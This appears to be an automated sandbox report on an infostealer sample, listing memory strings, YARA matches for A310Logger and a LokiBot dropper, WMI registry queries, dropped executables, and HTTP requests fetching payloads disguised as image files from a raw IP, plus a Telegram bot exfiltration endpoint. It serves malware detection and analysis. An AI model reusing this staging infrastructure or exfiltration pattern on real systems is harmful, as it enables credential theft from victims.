                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                  Source: BPL_1000572_007.bat.exe, 0000000D.00000002.579528582.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.449921184.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.452428690.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467298844.000000000109D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schema.org
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.448025477.0000000002961000.00000004.00000800.00020000.00000000.sdmp, Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.475145400.0000000002941000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.590879859.000000000329C000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.589770623.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.589535207.00000000033F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.476692694.0000000003969000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.478754600.0000000003A55000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.477582382.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000000.435627430.0000000000401000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://showip.netxhttp://www.mediacollege.com/internet/utilities/show-ip.shtml__vbaLsetFixstr__vbaFi
                  Source: Amcache.hve.21.drString found in binary or memory: http://upx.sf.net
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                  Source: LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.448721724.000000000298E000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.460105913.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.460105913.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.598968323.00000000034A4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592125246.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.598264553.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.590614103.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591295608.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.597986476.00000000035FF000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.590549636.0000000003428000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591002736.0000000003454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot4(SpawnProcess)
                  Source: LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                  Source: BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                  Source: BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                  Source: BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                  Source: BPL_1000572_007.bat.exe, 0000000D.00000002.579528582.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.449921184.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.452428690.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467298844.000000000109D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://showip.net/
                  Source: BPL_1000572_007.bat.exe, 0000000D.00000002.579528582.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.449921184.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.452428690.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467298844.000000000109D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://showip.net/?checkip=
                  Source: BPL_1000572_007.bat.exe, 0000000D.00000003.468874553.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000002.579802617.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.468843725.0000000001094000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467326371.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467288810.0000000001094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://unpkg.com/leaflet
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                  Source: BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                  Source: fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                  Source: BPL_1000572_007.bat.exe, BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                  Source: BPL_1000572_007.bat.exe, 0000000D.00000003.468874553.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000002.579802617.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467326371.00000000010AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openstreetmap.org/copyright
                  Source: unknownDNS traffic detected: queries for: showip.net
                  Source: global trafficHTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Project1sqliteHost: showip.net
                  Source: global trafficHTTP traffic detected: GET /loader/uploads/inf_Hpgwbzkt.bmp HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.441497333.0000000000D38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects A310Logger Author: ditekSHen
                  Source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.unpack, type: UNPACKEDPEMatched rule: Detects A310Logger Author: ditekSHen
                  Source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects A310Logger Author: ditekSHen
                  Source: 13.0.BPL_1000572_007.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects A310Logger Author: ditekSHen
                  Source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.unpack, type: UNPACKEDPEMatched rule: Detects A310Logger Author: ditekSHen
                  Source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.unpack, type: UNPACKEDPEMatched rule: Detects A310Logger Author: ditekSHen
                  Source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects A310Logger Author: ditekSHen
                  Source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects A310Logger Author: ditekSHen
                  Source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.unpack, type: UNPACKEDPEMatched rule: Detects A310Logger Author: ditekSHen
                  Source: 00000000.00000002.476692694.0000000003969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                  Source: 00000000.00000002.478754600.0000000003A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                  Source: 00000000.00000002.477582382.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                  Source: 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                  Writes or reads registry keys via WMI
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                  Source: BPL_1000572_007.bat.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                  Source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                  Source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                  Source: 13.0.BPL_1000572_007.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                  Source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                  Source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                  Source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                  Source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                  Source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                  Source: 00000000.00000002.476692694.0000000003969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 00000000.00000002.478754600.0000000003A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 00000000.00000002.477582382.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 1352
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeCode function: 0_2_00D2F288
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeCode function: 0_2_00D21019
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeCode function: 0_2_00D2F945
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeCode function: 0_2_00D2FA90
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeCode function: 0_2_00D2FA3A
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeCode function: 0_2_00D2F3CC
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeCode function: 0_2_02730040
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeCode function: 0_2_027357E0
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeCode function: 0_2_02737C50
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeCode function: 0_2_02730102
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeCode function: 0_2_027304F0
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeCode function: 0_2_0273D5E9
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeCode function: 0_2_00D258C4
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeCode function: 17_2_03040040
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeCode function: 17_2_030457E0
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeCode function: 17_2_0304D5F8
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeCode function: 17_2_03040102
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeCode function: 17_2_030404F0
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeCode function: 17_2_031FF282
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeCode function: 17_2_031FF3CC
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeCode function: 17_2_031FFA3A
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeCode function: 17_2_031FF945
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeCode function: 17_2_031F1019
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeCode function: 17_2_031F58C4
                  Source: BPL_1000572_007.bat.exeBinary or memory string: OriginalFilename vs BPL_1000572_007.bat.exe
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs BPL_1000572_007.bat.exe
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.479681642.0000000003A8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesemipyramidical.exe vs BPL_1000572_007.bat.exe
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.571147253.000000000CCE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAzyzrkioptrhfyauy.dll" vs BPL_1000572_007.bat.exe
                  Source: BPL_1000572_007.bat.exe, 00000000.00000000.257250957.00000000005B4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameArwiw.exep( vs BPL_1000572_007.bat.exe
                  Source: BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs BPL_1000572_007.bat.exe
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.450440697.0000000002A11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesemipyramidical.exe vs BPL_1000572_007.bat.exe
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.539813510.000000000448F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAzyzrkioptrhfyauy.dll" vs BPL_1000572_007.bat.exe
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.441497333.0000000000D38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs BPL_1000572_007.bat.exe
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.571001353.0000000009A00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArwiw.exep( vs BPL_1000572_007.bat.exe
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.478616339.0000000003A3F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesemipyramidical.exe vs BPL_1000572_007.bat.exe
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs BPL_1000572_007.bat.exe
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesemipyramidical.exe vs BPL_1000572_007.bat.exe
                  Source: BPL_1000572_007.bat.exe, 0000000D.00000000.436723511.000000000043A000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesemipyramidical.exe vs BPL_1000572_007.bat.exe
                  Source: BPL_1000572_007.bat.exe, 0000000D.00000002.580085124.00000000010BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArwiw.exep( vs BPL_1000572_007.bat.exe
                  Source: BPL_1000572_007.bat.exeBinary or memory string: OriginalFilenameArwiw.exep( vs BPL_1000572_007.bat.exe
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe 3BAEBB36220C28C56A692E59E683C77026DAD821CADC377D0D8452D712CCF7A3
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeFile read: C:\Users\user\Desktop\BPL_1000572_007.bat.exeJump to behavior
                  Source: BPL_1000572_007.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                  Source: unknownProcess created: C:\Users\user\Desktop\BPL_1000572_007.bat.exe "C:\Users\user\Desktop\BPL_1000572_007.bat.exe"
